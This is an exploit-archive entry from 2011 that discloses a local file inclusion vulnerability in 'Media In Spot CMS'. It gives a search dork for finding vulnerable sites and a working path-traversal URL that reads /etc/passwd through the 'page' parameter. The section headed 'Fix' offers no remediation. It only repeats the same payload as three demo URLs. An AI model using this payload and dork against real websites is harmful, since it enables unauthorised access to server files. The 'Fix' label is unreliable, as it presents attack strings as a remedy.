Media In Spot CMS Local File Inclusion Vulnerability
| EKU-ID: 238 | CVE: | OSVDB-ID: |
| Author: wlhaan haker | Published: 2011-05-17 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 238 | CVE: | OSVDB-ID: |
| Author: wlhaan haker | Published: 2011-05-17 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
#Name : Media In Spot LFI Vulnerability
#Date : May,16 2011
#Vendor Url :http:http://www.mediainspot.com/
#Dork:"
"Powred By Media In Spot""
#Author : wlhaan haker <iit[at]hotmail.com>
###############################################################################################################
Exploit:
http://server/path/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
###############################################################################################################
Fix:
demo
http://site.com/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
http://site.com/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
http://site.com/ufp/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd